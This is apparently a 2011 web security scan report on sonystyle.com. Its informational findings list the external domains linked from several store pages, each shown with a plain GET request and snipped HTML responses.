<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<p class="serviceDetails secondParagraph">
<a class="redArrowLink" href="https://sony.support.com/download/VAIO_PC_Health_Check_EN.exe">Run VAIO Health Check</a>
...[SNIP]...
<p class="serviceDetails secondParagraph">
<a class="redArrowLink" href="http://www.trackitback.com/backstage/">Learn more</a>
...[SNIP]...
<div class="locatorArea">
<a class="storeListingLink redArrowLink" href="http://www.docs.sony.com/startchat.asp?chat=1">Chat now</a>
...[SNIP]...
etails">
If you have a problem with your hardware, such as your LCD or hard drive, we're the right people to handle it. Most repairs take only 5-7 days from receipt of product. Find out more about our <a href="http://sonyrepairservices.com" target="blank" class="serviceDetailsLink">Sony VAIO Repair Service</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page&catalogId=10551&storeId=10151&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 84689
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 84689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo01_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo02_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo03_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.6. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter=false&storeId=10151&catalogId=10551&langId=-1&cmsId=tradeup HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92247
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 92247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li>
<a href="http://www.econewonline.com/sonystyle" target="_blank" class="">
<img src="/wcsstore/SonyStyleStorefrontAssetStore/img/static_images/tradein_cta_get_started_111x26.jpg" alt="Get Started" />
...[SNIP]...
</p>
<a class="redArrowLink" href="http://green.sel.sony.com" target="_blank">Learn more</a>
...[SNIP]...
<p class="answer">
A: Trade-in value offers are based on the reuse value of the item you are trading in.
<a href="http://recycling.econewonline.com/sonystyle/?q=main" target="_blank">Click here</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76356
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.8. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYSiteMapView

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SYSiteMapView?storeId=10151&catalogId=10551&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 165897
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 165897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
